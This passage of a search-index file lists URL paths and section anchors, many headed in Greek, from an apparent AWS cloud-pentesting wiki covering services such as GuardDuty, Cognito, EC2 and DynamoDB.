,"pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-guardduty-enum.html#guardduty","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-guardduty-enum.html#Ευρήματα-Παράδειγμα","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-guardduty-enum.html#Όλα-τα-Ευρήματα","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-guardduty-enum.html#Πολλαπλοί-Λογαριασμοί","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-guardduty-enum.html#enumeration","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-guardduty-enum.html#guardduty-bypass","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-guardduty-enum.html#Γενικές-Οδηγίες","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-guardduty-enum.html#Σπάζοντας-το-guardduty","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-guardduty-enum.html#Παραδείγματα-Παράκαμψης-Συγκεκριμένων-Ευρημάτων","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-guardduty-enum.html#Αναφορές","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-inspector-enum.html#aws---inspector-enum","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-inspector-enum.html#aws---inspector-enum-1","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-inspector-enum.html#inspector","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-inspector-enum.html#key-elements","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-inspector-enum.html#key-features","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-inspector-enum.html#enumeration","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-inspector-enum.html#post-exploitation","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-inspector-enum.html#Αναφορές","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-macie-enum.html#aws---macie-enum","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-macie-enum.html#aws---macie-enum-1","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-macie-enum.html#macie","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-macie-enum.html#Σύστημα-Ειδοποιήσεων","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-macie-enum.html#Χαρακτηριστικά-Πίνακα-Ελέγχου","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-macie-enum.html#Κατηγοριοποίηση-Χρηστών","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-macie-enum.html#Τύποι-Ταυτοτήτων","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-macie-enum.html#Κατηγοριοποίηση-Δεδομένων","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-macie-enum.html#Έρευνα-και-Ανάλυση","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-macie-enum.html#enumeration","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-macie-enum.html#Αναφορές","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-security-hub-enum.html#aws---security-hub-enum","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-security-hub-enum.html#security-hub","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-security-hub-enum.html#enumeration","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-security-hub-enum.html#Παράκαμψη-Ανίχνευσης","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-security-hub-enum.html#Αναφορές","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-shield-enum.html#aws---shield-enum","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-shield-enum.html#shield","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-trusted-advisor-enum.html#aws---trusted-advisor-enum","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-trusted-advisor-enum.html#aws---trusted-advisor-enum-1","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-trusted-advisor-enum.html#aws-trusted-advisor-overview","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-trusted-advisor-enum.html#notifications-and-data-refresh","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-trusted-advisor-enum.html#checks-breakdown","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-trusted-advisor-enum.html#references","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-waf-enum.html#aws---waf-enum","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-waf-enum.html#aws---waf-enum-1","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-waf-enum.html#aws-waf","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-waf-enum.html#Βασικές-έννοιες","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-waf-enum.html#Βασικά-χαρακτηριστικά","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-waf-enum.html#Αριθμητική","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-waf-enum.html#post-exploitation--bypass","pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-waf-enum.html#Αναφορές","pentesting-cloud/aws-security/aws-services/aws-api-gateway-enum.html#aws---api-gateway-enum","pentesting-cloud/aws-security/aws-services/aws-api-gateway-enum.html#api-gateway","pentesting-cloud/aws-security/aws-services/aws-api-gateway-enum.html#basic-information","pentesting-cloud/aws-security/aws-services/aws-api-gateway-enum.html#api-gateways-types","pentesting-cloud/aws-security/aws-services/aws-api-gateway-enum.html#api-gateway-main-components","pentesting-cloud/aws-security/aws-services/aws-api-gateway-enum.html#logging","pentesting-cloud/aws-security/aws-services/aws-api-gateway-enum.html#enumeration","pentesting-cloud/aws-security/aws-services/aws-api-gateway-enum.html#Διάφορες-Εξουσιοδοτήσεις-για-πρόσβαση-σε-api-gateway-endpoints","pentesting-cloud/aws-security/aws-services/aws-api-gateway-enum.html#Πολιτική-Πόρου","pentesting-cloud/aws-security/aws-services/aws-api-gateway-enum.html#iam-authorizer","pentesting-cloud/aws-security/aws-services/aws-api-gateway-enum.html#request-signing-using-python","pentesting-cloud/aws-security/aws-services/aws-api-gateway-enum.html#custom-lambda-authorizer","pentesting-cloud/aws-security/aws-services/aws-api-gateway-enum.html#Απαιτούμενο-api-key","pentesting-cloud/aws-security/aws-services/aws-api-gateway-enum.html#Μη-Αυθεντική-Πρόσβαση","pentesting-cloud/aws-security/aws-services/aws-api-gateway-enum.html#privesc","pentesting-cloud/aws-security/aws-services/aws-api-gateway-enum.html#post-exploitation","pentesting-cloud/aws-security/aws-services/aws-api-gateway-enum.html#persistence","pentesting-cloud/aws-security/aws-services/aws-certificate-manager-acm-and-private-certificate-authority-pca.html#aws---certificate-manager-acm--private-certificate-authority-pca","pentesting-cloud/aws-security/aws-services/aws-certificate-manager-acm-and-private-certificate-authority-pca.html#basic-information","pentesting-cloud/aws-security/aws-services/aws-certificate-manager-acm-and-private-certificate-authority-pca.html#enumeration","pentesting-cloud/aws-security/aws-services/aws-certificate-manager-acm-and-private-certificate-authority-pca.html#acm","pentesting-cloud/aws-security/aws-services/aws-certificate-manager-acm-and-private-certificate-authority-pca.html#pcm","pentesting-cloud/aws-security/aws-services/aws-certificate-manager-acm-and-private-certificate-authority-pca.html#privesc","pentesting-cloud/aws-security/aws-services/aws-certificate-manager-acm-and-private-certificate-authority-pca.html#post-exploitation","pentesting-cloud/aws-security/aws-services/aws-cloudformation-and-codestar-enum.html#aws---cloudformation--codestar-enum","pentesting-cloud/aws-security/aws-services/aws-cloudformation-and-codestar-enum.html#cloudformation","pentesting-cloud/aws-security/aws-services/aws-cloudformation-and-codestar-enum.html#enumeration","pentesting-cloud/aws-security/aws-services/aws-cloudformation-and-codestar-enum.html#privesc","pentesting-cloud/aws-security/aws-services/aws-cloudformation-and-codestar-enum.html#post-exploitation","pentesting-cloud/aws-security/aws-services/aws-cloudformation-and-codestar-enum.html#codestar","pentesting-cloud/aws-security/aws-services/aws-cloudformation-and-codestar-enum.html#enumeration-1","pentesting-cloud/aws-security/aws-services/aws-cloudformation-and-codestar-enum.html#privesc-1","pentesting-cloud/aws-security/aws-services/aws-cloudformation-and-codestar-enum.html#references","pentesting-cloud/aws-security/aws-services/aws-cloudhsm-enum.html#aws---cloudhsm-enum","pentesting-cloud/aws-security/aws-services/aws-cloudhsm-enum.html#hsm---hardware-security-module","pentesting-cloud/aws-security/aws-services/aws-cloudhsm-enum.html#cloudhsm-suggestions","pentesting-cloud/aws-security/aws-services/aws-cloudhsm-enum.html#what-is-a-hardware-security-module","pentesting-cloud/aws-security/aws-services/aws-cloudhsm-enum.html#enumeration","pentesting-cloud/aws-security/aws-services/aws-cloudfront-enum.html#aws---cloudfront-enum","pentesting-cloud/aws-security/aws-services/aws-cloudfront-enum.html#cloudfront","pentesting-cloud/aws-security/aws-services/aws-cloudfront-enum.html#functions","pentesting-cloud/aws-security/aws-services/aws-cloudfront-enum.html#enumeration","pentesting-cloud/aws-security/aws-services/aws-cloudfront-enum.html#Μη-Αυθεντικοποιημένη-Πρόσβαση","pentesting-cloud/aws-security/aws-services/aws-cloudfront-enum.html#Μετά-την-Εκμετάλλευση","pentesting-cloud/aws-security/aws-services/aws-codebuild-enum.html#aws---codebuild-enum","pentesting-cloud/aws-security/aws-services/aws-codebuild-enum.html#codebuild","pentesting-cloud/aws-security/aws-services/aws-codebuild-enum.html#githubgitlabbitbucket-credentials","pentesting-cloud/aws-security/aws-services/aws-codebuild-enum.html#enumeration","pentesting-cloud/aws-security/aws-services/aws-codebuild-enum.html#privesc","pentesting-cloud/aws-security/aws-services/aws-codebuild-enum.html#post-exploitation","pentesting-cloud/aws-security/aws-services/aws-codebuild-enum.html#unauthenticated-access","pentesting-cloud/aws-security/aws-services/aws-codebuild-enum.html#references","pentesting-cloud/aws-security/aws-services/aws-cognito-enum/index.html#aws---cognito-enum","pentesting-cloud/aws-security/aws-services/aws-cognito-enum/index.html#cognito","pentesting-cloud/aws-security/aws-services/aws-cognito-enum/index.html#user-pools","pentesting-cloud/aws-security/aws-services/aws-cognito-enum/index.html#identity-pools","pentesting-cloud/aws-security/aws-services/aws-cognito-enum/index.html#enumeration","pentesting-cloud/aws-security/aws-services/aws-cognito-enum/index.html#identity-pools---unauthenticated-enumeration","pentesting-cloud/aws-security/aws-services/aws-cognito-enum/index.html#user-pools---unauthenticated-enumeration","pentesting-cloud/aws-security/aws-services/aws-cognito-enum/index.html#privesc","pentesting-cloud/aws-security/aws-services/aws-cognito-enum/index.html#unauthenticated-access","pentesting-cloud/aws-security/aws-services/aws-cognito-enum/index.html#persistence","pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-identity-pools.html#cognito-identity-pools","pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-identity-pools.html#basic-information","pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-identity-pools.html#cognito-sync","pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-identity-pools.html#tools-for-pentesting","pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-identity-pools.html#Πρόσβαση-σε-iam-Ρόλους","pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-identity-pools.html#Χωρίς-Αυθεντικοποίηση","pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-identity-pools.html#enhanced-vs-basic-authentication-flow","pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-identity-pools.html#Αυθεντικοποιημένος","pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-user-pools.html#cognito-user-pools","pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-user-pools.html#basic-information","pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-user-pools.html#potential-attacks","pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-user-pools.html#tools-for-pentesting","pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-user-pools.html#Εγγραφή","pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-user-pools.html#Επιβεβαίωση-Εγγραφής","pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-user-pools.html#privilege-escalation--updating-attributes","pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-user-pools.html#ΑνάκτησηΑλλαγή-Κωδικού","pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-user-pools.html#Αυθεντικοποίηση","pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-user-pools.html#admin_no_srp_auth--admin_user_password_auth","pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-user-pools.html#user_password_auth","pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-user-pools.html#user_srp_auth","pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-user-pools.html#refresh_token_auth--refresh_token","pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-user-pools.html#custom_auth","pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-user-pools.html#extra-security","pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-user-pools.html#advanced-security","pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-user-pools.html#mfa-remember-device","pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-user-pools.html#user-pool-groups-iam-roles","pentesting-cloud/aws-security/aws-services/aws-datapipeline-codepipeline-codebuild-and-codecommit.html#aws---datapipeline-codepipeline--codecommit-enum","pentesting-cloud/aws-security/aws-services/aws-datapipeline-codepipeline-codebuild-and-codecommit.html#datapipeline","pentesting-cloud/aws-security/aws-services/aws-datapipeline-codepipeline-codebuild-and-codecommit.html#enumeration","pentesting-cloud/aws-security/aws-services/aws-datapipeline-codepipeline-codebuild-and-codecommit.html#privesc","pentesting-cloud/aws-security/aws-services/aws-datapipeline-codepipeline-codebuild-and-codecommit.html#codepipeline","pentesting-cloud/aws-security/aws-services/aws-datapipeline-codepipeline-codebuild-and-codecommit.html#enumeration-1","pentesting-cloud/aws-security/aws-services/aws-datapipeline-codepipeline-codebuild-and-codecommit.html#privesc-1","pentesting-cloud/aws-security/aws-services/aws-datapipeline-codepipeline-codebuild-and-codecommit.html#codecommit","pentesting-cloud/aws-security/aws-services/aws-datapipeline-codepipeline-codebuild-and-codecommit.html#enumeration-2","pentesting-cloud/aws-security/aws-services/aws-datapipeline-codepipeline-codebuild-and-codecommit.html#Αναφορές","pentesting-cloud/aws-security/aws-services/aws-directory-services-workdocs-enum.html#aws---Υπηρεσίες-Καταλόγου--Εξακρίβωση-workdocs","pentesting-cloud/aws-security/aws-services/aws-directory-services-workdocs-enum.html#Υπηρεσίες-Καταλόγου","pentesting-cloud/aws-security/aws-services/aws-directory-services-workdocs-enum.html#Επιλογές","pentesting-cloud/aws-security/aws-services/aws-directory-services-workdocs-enum.html#Εργαστήριο","pentesting-cloud/aws-security/aws-services/aws-directory-services-workdocs-enum.html#Εξακρίβωση","pentesting-cloud/aws-security/aws-services/aws-directory-services-workdocs-enum.html#Σύνδεση","pentesting-cloud/aws-security/aws-services/aws-directory-services-workdocs-enum.html#Κλιμάκωση-Δικαιωμάτων","pentesting-cloud/aws-security/aws-services/aws-directory-services-workdocs-enum.html#Επιμονή","pentesting-cloud/aws-security/aws-services/aws-directory-services-workdocs-enum.html#Χρησιμοποιώντας-έναν-χρήστη-ad","pentesting-cloud/aws-security/aws-services/aws-directory-services-workdocs-enum.html#Κοινή-Χρήση-ad-από-θύμα-σε-επιτιθέμενο","pentesting-cloud/aws-security/aws-services/aws-directory-services-workdocs-enum.html#Κοινή-Χρήση-ad-από-επιτιθέμενο-σε-θύμα","pentesting-cloud/aws-security/aws-services/aws-directory-services-workdocs-enum.html#workdocs","pentesting-cloud/aws-security/aws-services/aws-directory-services-workdocs-enum.html#Αρίθμηση","pentesting-cloud/aws-security/aws-services/aws-directory-services-workdocs-enum.html#privesc","pentesting-cloud/aws-security/aws-services/aws-documentdb-enum.html#aws---documentdb-enum","pentesting-cloud/aws-security/aws-services/aws-documentdb-enum.html#documentdb","pentesting-cloud/aws-security/aws-services/aws-documentdb-enum.html#enumeration","pentesting-cloud/aws-security/aws-services/aws-documentdb-enum.html#nosql-injection","pentesting-cloud/aws-security/aws-services/aws-documentdb-enum.html#documentdb-1","pentesting-cloud/aws-security/aws-services/aws-documentdb-enum.html#references","pentesting-cloud/aws-security/aws-services/aws-dynamodb-enum.html#aws---dynamodb-enum","pentesting-cloud/aws-security/aws-services/aws-dynamodb-enum.html#dynamodb","pentesting-cloud/aws-security/aws-services/aws-dynamodb-enum.html#basic-information","pentesting-cloud/aws-security/aws-services/aws-dynamodb-enum.html#encryption","pentesting-cloud/aws-security/aws-services/aws-dynamodb-enum.html#backups--export-to-s3","pentesting-cloud/aws-security/aws-services/aws-dynamodb-enum.html#gui","pentesting-cloud/aws-security/aws-services/aws-dynamodb-enum.html#enumeration","pentesting-cloud/aws-security/aws-services/aws-dynamodb-enum.html#Μη-Αυθεντικοποιημένη-Πρόσβαση","pentesting-cloud/aws-security/aws-services/aws-dynamodb-enum.html#privesc","pentesting-cloud/aws-security/aws-services/aws-dynamodb-enum.html#Μετά-την-Εκμετάλλευση","pentesting-cloud/aws-security/aws-services/aws-dynamodb-enum.html#Επιμονή","pentesting-cloud/aws-security/aws-services/aws-dynamodb-enum.html#Εισαγωγή-dynamodb","pentesting-cloud/aws-security/aws-services/aws-dynamodb-enum.html#sql-Εισαγωγή","pentesting-cloud/aws-security/aws-services/aws-dynamodb-enum.html#nosql-Εισαγωγή","pentesting-cloud/aws-security/aws-services/aws-dynamodb-enum.html#raw-json-injection","pentesting-cloud/aws-security/aws-services/aws-dynamodb-enum.html#property-injection","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/index.html#aws---ec2-ebs-elb-ssm-vpc--vpn-enum","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/index.html#vpc--networking","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/index.html#ec2","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/index.html#instance-profiles","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/index.html#metadata-endpoint","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/index.html#enumeration","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/index.html#Μη-Αυθεντικοποιημένη-Πρόσβαση","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/index.html#privesc","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/index.html#Μετά-την-Εκμετάλλευση","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/index.html#ebs","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/index.html#Διαφορά-ami--ebs","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/index.html#privesc-1","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/index.html#ssm","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/index.html#Αριθμητική","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/index.html#privesc-2","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/index.html#elb","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/index.html#enumeration-1","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/index.html#Πρότυπα-Εκκίνησης--Ομάδες-Αυτόματης-Κλιμάκωσης","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/index.html#Καταμέτρηση","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/index.html#nitro","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/index.html#vpn","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/index.html#enumeration-2","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/index.html#Τοπική-Αρίθμηση","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/index.html#Αναφορές","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-nitro-enum.html#aws---nitro-enum","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-nitro-enum.html#basic-information","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-nitro-enum.html#nitro-enclaves","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-nitro-enum.html#nitro-enclave-cli-installation","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-nitro-enum.html#nitro-enclave-images","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-nitro-enum.html#Εκτέλεση-μιας-Εικόνας","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-nitro-enum.html#Καταμέτρηση-Ενκλάβων","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-nitro-enum.html#Τερματισμός-Ενκλάβων","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-nitro-enum.html#vsocks","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-nitro-enum.html#vsock-serverlistener","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-nitro-enum.html#vsock-client","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-nitro-enum.html#vsock-proxy","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-nitro-enum.html#nitro-enclave-atestation--kms","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-nitro-enum.html#pcr-bypass","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-nitro-enum.html#Αναφορές","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-vpc-and-networking-basic-information.html#aws---vpc--networking-basic-information","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-vpc-and-networking-basic-information.html#aws-networking-in-a-nutshell","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-vpc-and-networking-basic-information.html#vpc","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-vpc-and-networking-basic-information.html#subnets","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-vpc-and-networking-basic-information.html#route-tables","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-vpc-and-networking-basic-information.html#acls","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-vpc-and-networking-basic-information.html#security-groups","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-vpc-and-networking-basic-information.html#elastic-ip-addresses","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-vpc-and-networking-basic-information.html#connection-between-subnets","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-vpc-and-networking-basic-information.html#vpc-peering","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-vpc-and-networking-basic-information.html#vpc-flow-logs","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-vpc-and-networking-basic-information.html#vpn","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-vpc-and-networking-basic-information.html#basic-aws-vpn-components","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-vpc-and-networking-basic-information.html#site-to-site-vpn","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-vpc-and-networking-basic-information.html#client-vpn","pentesting-cloud/aws-security/aws-services/aws-ecr-enum.html#aws---ecr-enum","pentesting-cloud/aws-security/aws-services/aws-ecr-enum.html#aws---ecr-enum-1","pentesting-cloud/aws-security/aws-services/aws-ecr-enum.html#ecr","pentesting-cloud/aws-security/aws-services/aws-ecr-enum.html#Αναφορές","pentesting-cloud/aws-security/aws-services/aws-ecs-enum.html#aws---ecs-enum","pentesting-cloud/aws-security/aws-services/aws-ecs-enum.html#ecs","pentesting-cloud/aws-security/aws-services/aws-ecs-enum.html#basic-information","pentesting-cloud/aws-security/aws-services/aws-ecs-enum.html#sensitive-data-in-task-definitions","pentesting-cloud/aws-security/aws-services/aws-ecs-enum.html#enumeration","pentesting-cloud/aws-security/aws-services/aws-ecs-enum.html#Μη-Αυθεντικοποιημένη-Πρόσβαση","pentesting-cloud/aws-security/aws-services/aws-ecs-enum.html#Ανάβαση-Δικαιωμάτων","pentesting-cloud/aws-security/aws-services/aws-ecs-enum.html#Μετά-την-Εκμετάλλευση","pentesting-cloud/aws-security/aws-services/aws-ecs-enum.html#Επιμονή","pentesting-cloud/aws-security/aws-services/aws-eks-enum.html#aws---eks-enum","pentesting-cloud/aws-security/aws-services/aws-eks-enum.html#eks","pentesting-cloud/aws-security/aws-services/aws-eks-enum.html#Αναφορές","pentesting-cloud/aws-security/aws-services/aws-elastic-beanstalk-enum.html#aws---elastic-beanstalk-enum","pentesting-cloud/aws-security/aws-services/aws-elastic-beanstalk-enum.html#elastic-beanstalk","pentesting-cloud/aws-security/aws-services/aws-elastic-beanstalk-enum.html#Εφαρμογή--Περιβάλλοντα","pentesting-cloud/aws-security/aws-services/aws-elastic-beanstalk-enum.html#2-τύποι-Περιβαλλόντων","pentesting-cloud/aws-security/aws-services/aws-elastic-beanstalk-enum.html#Ασφάλεια","pentesting-cloud/aws-security/aws-services/aws-elastic-beanstalk-enum.html#Έκθεση","pentesting-cloud/aws-security/aws-services/aws-elastic-beanstalk-enum.html#Αριθμητική","pentesting-cloud/aws-security/aws-services/aws-elastic-beanstalk-enum.html#Μη-Αυθεντικοποιημένη-Πρόσβαση","pentesting-cloud/aws-security/aws-services/aws-elastic-beanstalk-enum.html#Επιμονή","pentesting-cloud/aws-security/aws-services/aws-elastic-beanstalk-enum.html#Ανάβαση-Δικαιωμάτων","pentesting-cloud/aws-security/aws-services/aws-elastic-beanstalk-enum.html#Μετά-την-Εκμετάλλευση","pentesting-cloud/aws-security/aws-services/aws-elasticache.html#aws---elasticache","pentesting-cloud/aws-security/aws-services/aws-elasticache.html#elasticache","pentesting-cloud/aws-security/aws-services/aws-elasticache.html#enumeration","pentesting-cloud/aws-security/aws-services/aws-elasticache.html#privesc-todo","pentesting-cloud/aws-security/aws-services/aws-emr-enum.html#aws---emr-enum","pentesting-cloud/aws-security/aws-services/aws-emr-enum.html#emr","pentesting-cloud/aws-security/aws-services/aws-emr-enum.html#Αναφορές","pentesting-cloud/aws-security/aws-services/aws-efs-enum.html#aws---efs-enum","pentesting-cloud/aws-security/aws-services/aws-efs-enum.html#efs","pentesting-cloud/aws-security/aws-services/aws-efs-enum.html#basic-information","pentesting-cloud/aws-security/aws-services/aws-efs-enum.html#network-access","pentesting-cloud/aws-security/aws-services/aws-efs-enum.html#enumeration","pentesting-cloud/aws-security/aws-services/aws-efs-enum.html#mount-efs","pentesting-cloud/aws-security/aws-services/aws-efs-enum.html#iam-access","pentesting-cloud/aws-security/aws-services/aws-efs-enum.html#access-points","pentesting-cloud/aws-security/aws-services/aws-efs-enum.html#efs-ip-διεύθυνση","pentesting-cloud/aws-security/aws-services/aws-efs-enum.html#privesc","pentesting-cloud/aws-security/aws-services/aws-efs-enum.html#post-exploitation","pentesting-cloud/aws-security/aws-services/aws-efs-enum.html#persistence","pentesting-cloud/aws-security/aws-services/eventbridgescheduler-enum.html#aws---eventbridge-scheduler-enum","pentesting-cloud/aws-security/aws-services/eventbridgescheduler-enum.html#eventbridge-scheduler","pentesting-cloud/aws-security/aws-services/eventbridgescheduler-enum.html#eventbridge-scheduler-1","pentesting-cloud/aws-security/aws-services/eventbridgescheduler-enum.html#types-of-schedules","pentesting-cloud/aws-security/aws-services/eventbridgescheduler-enum.html#targets","pentesting-cloud/aws